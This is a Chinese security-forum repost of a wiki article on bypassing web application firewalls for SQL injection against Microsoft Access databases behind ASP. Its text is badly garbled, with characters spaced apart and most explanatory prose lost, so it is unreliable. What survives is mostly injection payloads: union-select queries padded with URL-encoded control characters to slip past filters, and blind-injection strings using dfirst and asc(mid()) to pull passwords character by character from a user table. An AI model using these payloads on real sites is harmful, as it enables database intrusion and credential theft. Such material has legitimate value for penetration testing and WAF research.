设为首页收藏本站
切换到窄版

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
Nmaps Club»论坛 Pentests Wiki Wiki 数据库 [893] 2019-01-23_WAFBypass数据库特性(Access探索篇) ...
返回列表 发新帖
查看: 4|回复: 0

[893] 2019-01-23_WAFBypass数据库特性(Access探索篇)

[复制链接]
s7ckTeam

6万

主题

-6万

回帖

-58

积分

管理员

积分
-58
发表于 7 天前 | 显示全部楼层 |阅读模式
2019-01-23_WAFBypass数据库特性(Access探索篇) W A F   B y p a s s A c c e s s   B y p a s s   B y p a s s   2 0 1 9 - 0 1 - 2 3   # W A F   , 9 0 x 0 1   W A F A c c e s s A S P a c c e s s 0 x 0 2   5 s e l e c t   *   f r o m   a d m i n   w h e r e   i d = 1 u n i o n s e l e c t 1 , 2 , d b _ n a m e ( ) f r o m a d m i n u n i o n 1 A c c e s s % 0 9 % 0 a % 0 c % 0 d % 1 6 2 % 3 b u n i o n s e l e c t 1 A c c e s s % 0 9 % 0 a % 0 c % 0 d s e l e c t 1 A c c e s s % 0 9 % 0 a % 0 c % 0 d 2 % 2 b % 2 d % 2 e % 3 d f r o m 1 A c c e s s % 0 9 % 0 a % 0 c % 0 d f r o m 1 A c c e s s % 0 9 % 0 a % 0 c % 0 d
0 x 0 3   A C C E S S s e l e c t   S Q L 1   s e l e c t   *   f r o m   i d e a _ u s e r   w h e r e   i d = 3 + ( d f i r s t ( [ p a s s w o r d ] , ( [ i d e a _ u s e r ] ! [ p a s s w o r d ] ) ) ) 2 s e l e c t   *   f r o m   i d e a _ u s e r   w h e r e   i d = 3 + a s c ( m i d ( ( d f i r s t ( " [ p a s s w o r d ] " , " [ i d e a _ u s e r ] " ) ) , 1 , 1 ) ) - 1 0 1 p a s s w o r d e a s c i i 1 0 1 i d = 3 + 1 0 1 - 1 0 1   3 0 x 0 4   A S P + A c c e s s W A F M y s q l / M S s q l A c c e s s 便 B y p a s s A b o u t   M e W A F
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver|手机版|小黑屋|Nmaps Club

GMT+8, 2025-1-23 10:36 , Processed in 0.093098 second(s), 29 queries .

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表